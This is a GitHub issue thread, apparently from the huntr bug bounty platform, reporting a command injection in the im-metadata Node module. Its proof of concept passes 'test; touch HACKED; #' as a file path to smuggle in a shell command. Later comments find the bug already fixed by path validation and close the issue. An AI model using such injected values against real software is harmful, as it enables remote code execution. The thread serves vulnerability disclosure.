### ISSUE TITLE
huntr -  RCE via insecure command formatting (Command Injection)

### ISSUE THREAD

**Issue by huntr-helper** [Turistforeningen/node-im-metadata#11]
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

## Details
I would like to report a `RCE` issue in the `im-metadata` module.
It allows to execute `arbitrary commands remotely inside the victim's PC`

## Vulnerability Description
The issue occurs because a `user input` is formatted inside a `command` that will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-metadata/blob/master/index.js#L39

## Steps To Reproduce:
1. Create the following PoC file:

```js
// poc.js
var metadata = require('im-metadata');
metadata('test; touch HACKED; #', {}, function(){})

```
2. Check there aren't files called `HACKED` 
3. Execute the following commands in another terminal:

```bash
npm i im-metadata # Install affected module
node poc.js #  Run the PoC
```
4. Recheck the files: now `HACKED` has been created :)

**Bug Bounty**

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

**Comment by adi928** [comment]
<img width="1230" alt="image" src="https://user-images.githubusercontent.com/2073268/77798935-2e021280-704a-11ea-8038-39e477e6bdde.png">

As you can see, on running the poc, the bug is not recreated. So there is nothing to fix. Further, I noticed that there is a file path validation in place. The poc seems outdated since the fix has been committed around 2 months back.
https://github.com/Turistforeningen/node-im-metadata/commit/ea15dddbe0f65694bfde36b78dd488e90f246639

**Comment by JamieSlome** [comment]
@adi928 - thanks for spotting this! We are now closing this issue and the bounty on the platform! 🍰 😄
